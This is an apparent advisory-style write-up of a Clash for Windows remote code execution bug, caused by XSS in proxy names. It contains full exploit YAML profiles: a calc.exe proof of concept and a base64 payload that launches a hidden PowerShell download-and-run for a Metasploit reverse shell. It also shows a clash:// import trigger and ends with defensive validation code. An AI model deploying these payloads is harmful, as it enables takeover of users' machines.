0x01 Vulnerability description
Clash is a rule-based, cross-platform proxy core written in Go. Clash for Windows is a graphical Clash branch that runs on Windows; it configures and controls the Clash core through the Clash API so that users can operate it visually.
Download link
https://github.com/Fndroid/clash_for_windows_pkg/releases
The current latest version is V0.20.12.
Clash for Windows has a remote command execution vulnerability that is triggered when a malicious subscription link is imported. The proxy rule configuration file is not subjected to strict input validation, so an attacker can execute arbitrary JavaScript by placing an XSS payload in the proxy configuration file.
0x02 Vulnerability impact
Affected versions: < V0.20.12
Operating system: Windows x64
System version: Windows 11
Risk level: High
0x03 Reproduction
This reproduction uses version v0.18.8 on Windows 10.
Create a poc.yaml file with the following content:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
proxy-groups:
  - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
      - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
Open Clash, go to Profiles, click Import and import the poc.yaml file just created.
Click to switch to the imported yaml profile.
When the node is switched, the calculator pops up, which shows that remote code execution succeeded.
Getting a session in msf
Start msf and search for the web_delivery module.
Use the exploit/multi/script/web_delivery module.
Set lhost:
set lhost <attacking-machine IP>
Set the target.
Set the payload.
Generate the reverse-shell payload:
powershell.exe -nop -w hidden -e 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
Build the exp
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror='eval(new Buffer(`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`,`base64`).toString())'>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
proxy-groups:
  - name: <img/src="1"/onerror='eval(new Buffer(`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`,`base64`).toString())'>
    type: select
    proxies:
      - a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
Place the exp in the root directory of the attacking machine (Kali).
Import it in Clash.
Click to switch to the imported yaml profile.
When the node is switched, the session comes back to msf.
0x04 Vulnerability analysis
clash_for_windows is built on Electron. The product performs no strict input validation on the proxy rule configuration file, so an attacker can execute arbitrary JavaScript by putting an XSS payload in the proxy configuration file.
The "name" field under "proxies" embeds an HTML tag, and the statement in "onerror" runs when that handler fires:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
The yaml configuration file can also be imported locally instead of via a subscription.
Another approach triggers the import through a browser pop-up:
clash://install-config?url=http://ip:port/eval.txt&name=RCE
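As an added defensive example that is not part of the original write-up: a small pre-import check in JavaScript that pulls the display names (`name:` values and the proxy references inside a proxy-group) out of a Clash profile and flags any that contain HTML metacharacters, next to the escaping a renderer must apply before such a name reaches innerHTML. The sample profile is constructed and carries a harmless alert(1) in place of the page's payload.

```javascript
// Constructed sample profile in the layout the write-up uses; the hostile
// names carry a harmless alert(1) in place of the page's payload.
const SAMPLE_PROFILE = `
proxies:
- name: a<img/src="1"/onerror=alert(1)>
  type: socks5
  server: 127.0.0.1
  port: "17938"
- name: abc
  type: socks5
  server: 127.0.0.1
  port: "8088"
proxy-groups:
- name: <img/src="1"/onerror=alert(1)>
  type: select
  proxies:
  - a<img/src="1"/onerror=alert(1)>
`;

// Collect every display name a profile carries: values of `name:` keys plus
// the bare proxy references listed under a proxy-group. A line scanner is
// enough for this flat layout, so no YAML library is needed.
function extractNames(profileText) {
  const names = [];
  for (const raw of profileText.split('\n')) {
    const line = raw.trim();
    let m = line.match(/^(?:-\s*)?name:\s*(.+)$/);
    if (m) { names.push(m[1].trim()); continue; }
    m = line.match(/^-\s+(.+)$/);                 // bare list item
    if (m && !/^[\w-]+:(\s|$)/.test(m[1])) names.push(m[1].trim());
  }
  return names;
}

// A name exists only to be displayed, so any character that could open a tag
// or an attribute has no business in it. Returns the offending names.
const UNSAFE_NAME = /[<>"'`]/;
function findUnsafeNames(profileText) {
  return extractNames(profileText).filter(n => UNSAFE_NAME.test(n));
}

// What a renderer must do with an untrusted name before it reaches innerHTML:
// escape it so the browser treats it as text rather than markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return s.replace(/[&<>"'`]/g, c => map[c]);
}
```

Running findUnsafeNames over the sample reports the three injected names and nothing for the clean profile, which is the check a client should make before a subscribed profile is ever rendered.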
0x05 Remediation
Update to the latest version.
0x06 References
https://github.com/Fndroid/clash_for_windows_pkg/issues/2710
https://blog.csdn.net/WEARE001/article/details/123146639
https://mp.weixin.qq.com/s/-jmAXSWOpncnLCWFEAiVgQ